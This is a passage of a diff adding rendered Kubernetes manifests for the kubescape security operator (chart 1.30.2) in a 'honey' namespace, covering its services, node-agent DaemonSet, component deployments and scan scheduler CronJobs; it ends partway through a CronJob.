+apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: operator +subjects: +- kind: ServiceAccount + name: operator + namespace: honey +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - name: http + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape +--- +apiVersion: v1 +kind: Service +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln +--- +apiVersion: v1 +kind: Service +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - name: prometheus + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape-admission-webhook + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + targetPort: 8443 + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + type: ClusterIP +--- +apiVersion: v1 +kind: Service +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 4002 + targetPort: 4002 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator +--- +apiVersion: v1 +kind: Service +metadata: + name: prometheus-exporter + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: null + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter +--- +apiVersion: v1 +kind: Service +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + protocol: TCP + targetPort: 8443 + name: https + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage +--- +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + template: + metadata: + annotations: + checksum/node-agent-config: ec2818edfe76e3a71137b1e9c55bd598a3f49c75af64d9f74061e320150c439b + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + container.apparmor.security.beta.kubernetes.io/node-agent: unconfined + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: null + priorityClassName: kubescape-critical + serviceAccountName: node-agent + automountServiceAccountToken: true + hostPID: true + volumes: + - hostPath: + path: / + name: host + - hostPath: + path: /var/lib/kubelet + name: kubeletdir + - hostPath: + path: /run + name: run + - hostPath: + path: /var + name: var + - hostPath: + path: /sys/fs/cgroup + name: cgroup + - hostPath: + path: /lib/modules + name: modules + - hostPath: + path: /sys/fs/bpf + name: bpffs + - hostPath: + path: /sys/kernel/debug + name: debugfs + - hostPath: + path: /boot + name: boot + - emptyDir: null + name: data + - emptyDir: null + name: profiles + - emptyDir: {} + name: clamdb + - emptyDir: {} + name: clamrun + - configMap: + items: + - key: clamd.conf + path: clamd.conf + - key: freshclam.conf + path: freshclam.conf + name: clamav + name: etc + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: node-agent + items: + - key: config.json + path: config.json + containers: + - name: node-agent + image: ghcr.io/k8sstormcenter/node-agent:dev-e64d59a + imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: /livez + port: 7888 + initialDelaySeconds: 60 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 7888 + initialDelaySeconds: 3 + periodSeconds: 3 + resources: + limits: + cpu: 500m + memory: 1400Mi + requests: + cpu: 100m + memory: 180Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: HOST_ROOT + value: /host + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: NAMESPACE_NAME + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KUBELET_ROOT + value: /var/lib/kubelet + - name: AGENT_VERSION + value: dev-e64d59a + - name: NodeName + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + privileged: false + capabilities: + add: + - SYS_ADMIN + - SYS_PTRACE + - NET_ADMIN + - SYSLOG + - SYS_RESOURCE + - IPC_LOCK + - NET_RAW + seLinuxOptions: + type: spc_t + volumeMounts: + - mountPath: /host + name: host + readOnly: true + - mountPath: /var/lib/kubelet + name: kubeletdir + - mountPath: /run + name: run + - mountPath: /var + name: var + readOnly: true + - mountPath: /lib/modules + name: modules + readOnly: true + - mountPath: /sys/kernel/debug + name: debugfs + - mountPath: /sys/fs/cgroup + name: cgroup + readOnly: true + - mountPath: /sys/fs/bpf + name: bpffs + - mountPath: /data + name: data + - mountPath: /profiles + name: profiles + - mountPath: /boot + name: boot + readOnly: true + - mountPath: /clamav + name: clamrun + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + nodeSelector: + kubernetes.io/os: linux + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/os + operator: In + values: + - linux + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + template: + metadata: + annotations: + checksum/host-scanner-configmap: 0c613e2144b1680df672142a6083c39de89a1c781db9d1a60eb31789966a26ea + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubescape + image: quay.io/kubescape/kubescape:v3.0.47 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: http + containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /livez + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: KS_DOWNLOAD_ARTIFACTS + value: 'true' + - name: RULE_PROCESSING_GOMAXPROCS + value: '' + - name: KS_DEFAULT_CONFIGMAP_NAME + value: kubescape-config + - name: KS_DEFAULT_CONFIGMAP_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KS_CONTEXT + value: bobexample + - name: KS_DEFAULT_CLOUD_CONFIGMAP_NAME + value: ks-cloud-config + - name: KS_ENABLE_HOST_SCANNER + value: 'true' + - name: KS_SKIP_UPDATE_CHECK + value: 'false' + - name: KS_HOST_SCAN_YAML + value: /home/nonroot/.kubescape/host-scanner.yaml + - name: LARGE_CLUSTER_SIZE + value: '1500' + - name: KS_EXCLUDE_NAMESPACES + value: kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse + command: + - ksserver + resources: + limits: + cpu: 600m + memory: 1Gi + requests: + cpu: 250m + memory: 400Mi + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: kubescape-volume + mountPath: /home/nonroot/.kubescape + subPath: config.json + - name: host-scanner-definition + mountPath: /home/nonroot/.kubescape/host-scanner.yaml + subPath: host-scanner-yaml + - name: results + mountPath: /home/nonroot/results + - name: failed + mountPath: /home/nonroot/failed + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: host-scanner-definition + configMap: + name: host-scanner-definition + - name: kubescape-volume + emptyDir: {} + - name: results + emptyDir: {} + - name: failed + emptyDir: {} + serviceAccountName: kubescape + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + template: + metadata: + annotations: + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubevuln + image: quay.io/kubescape/kubevuln:v0.3.98 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: 8080 + resources: + limits: + cpu: 1500m + ephemeral-storage: 10Gi + memory: 5000Mi + requests: + cpu: 300m + ephemeral-storage: 5Gi + memory: 1000Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: PRINT_POST_JSON + value: '' + - name: CA_MAX_VULN_SCAN_ROUTINES + value: '1' + args: + - -alsologtostderr + - -v=4 + - 2>&1 + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: grype-db-cache + mountPath: /home/nonroot/anchore-resources/db + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: grype-db + mountPath: /home/nonroot/.cache/grype + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tmp-dir + emptyDir: {} + - name: grype-db-cache + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: grype-db + emptyDir: {} + serviceAccountName: kubevuln + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + template: + metadata: + annotations: + checksum/operator-config: 4390a54f76466bfe8f7b90c12e53ada738e0cbc316cd132c17604a94c3b6d885 + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + checksum/capabilities-config: 6de901b4ead657e549bb9a6eef97eb55bbed2e0508a7a1875d2a48c9b29c0402 + checksum/matching-rules-config: 061617180b4f2780bd091c456b13a4b789654739862e082e4ad357c3ed226561 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: operator + image: quay.io/kubescape/operator:v0.2.121 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: trigger-port + containerPort: 4002 + protocol: TCP + - name: readiness-port + containerPort: 8000 + protocol: TCP + - name: admission-port + containerPort: 8443 + protocol: TCP + livenessProbe: + httpGet: + path: /v1/liveness + port: readiness-port + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /v1/readiness + port: readiness-port + initialDelaySeconds: 10 + periodSeconds: 5 + resources: + limits: + cpu: 300m + memory: 300Mi + requests: + cpu: 50m + memory: 100Mi + env: + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: HELM_RELEASE + value: kubescape-operator-1.30.2 + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: tmp-dir + mountPath: /tmp + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: ks-capabilities + mountPath: /etc/config/capabilities.json + readOnly: true + subPath: capabilities.json + - name: cs-matching-rules + mountPath: /etc/config/matchingRules.json + readOnly: true + subPath: matchingRules.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: tls-certs + mountPath: /etc/certs + readOnly: true + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: tls-certs + secret: + secretName: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + - name: tmp-dir + emptyDir: {} + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: ks-capabilities + configMap: + name: ks-capabilities + items: + - key: capabilities + path: capabilities.json + - name: config + configMap: + name: operator + items: + - key: config.json + path: config.json + - name: cs-matching-rules + configMap: + name: cs-matching-rules + items: + - key: matchingRules.json + path: matchingRules.json + serviceAccountName: operator + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: prometheus-exporter + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: prometheus-exporter + image: quay.io/kubescape/prometheus-exporter:v0.2.11 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: metrics + containerPort: 8080 + protocol: TCP + livenessProbe: + tcpSocket: + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + tcpSocket: + port: 8080 + resources: + limits: + cpu: 50m + memory: 100Mi + requests: + cpu: 10m + memory: 10Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: ks-cloud-config + mountPath: /etc/config + readOnly: true + volumes: + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + serviceAccountName: prometheus-exporter + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + serviceAccountName: storage + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: apiserver + image: ghcr.io/k8sstormcenter/storage:dev-e64d59a + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + runAsNonRoot: true + livenessProbe: + httpGet: + path: /livez + port: 8443 + scheme: HTTPS + readinessProbe: + httpGet: + path: /readyz + port: 8443 + scheme: HTTPS + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + volumeMounts: + - name: data + mountPath: /data + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + - name: ca-certificates + mountPath: /etc/storage-ca-certificates + readOnly: true + resources: + limits: + cpu: 1500m + memory: 1500Mi + requests: + cpu: 100m + memory: 400Mi + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: data + persistentVolumeClaim: + claimName: kubescape-storage + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: storage + items: + - key: config.json + path: config.json + - name: ca-certificates + secret: + secretName: storage-ca +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: kubescape-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core +spec: + schedule: 12 21 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: kubescape-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubescape-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 100 + args: + - -method=post + - -scheme=http + - -host=operator:4002 + - -path=v1/triggerAction + - -headers=Content-Type:application/json + - -path-body=/home/ks/request-body.json + volumeMounts: + - name: kubescape-scheduler + mountPath: /home/ks/request-body.json + subPath: request-body.json + readOnly: true + restartPolicy: Never + serviceAccountName: kubescape + automountServiceAccountToken: false + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null + volumes: + - name: kubescape-scheduler + configMap: + name: kubescape-scheduler +--- +apiVersion: batch/v1 +kind: CronJob +metadata: + name: kubevuln-scheduler + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core +spec: + schedule: 24 0 * * * + successfulJobsHistoryLimit: 3 + failedJobsHistoryLimit: 1 + jobTemplate: + spec: + template: + metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln-scheduler + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln-scheduler + tier: ks-control-plane + kubescape.io/ignore: 'true' + armo.tier: vuln-scan + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - name: kubevuln-scheduler + image: quay.io/kubescape/http-request:v0.2.16 + imagePullPolicy: IfNotPresent + resources: + limits: + cpu: 10m + memory: 20Mi + requests: + cpu: 1m + memory: 10Mi + 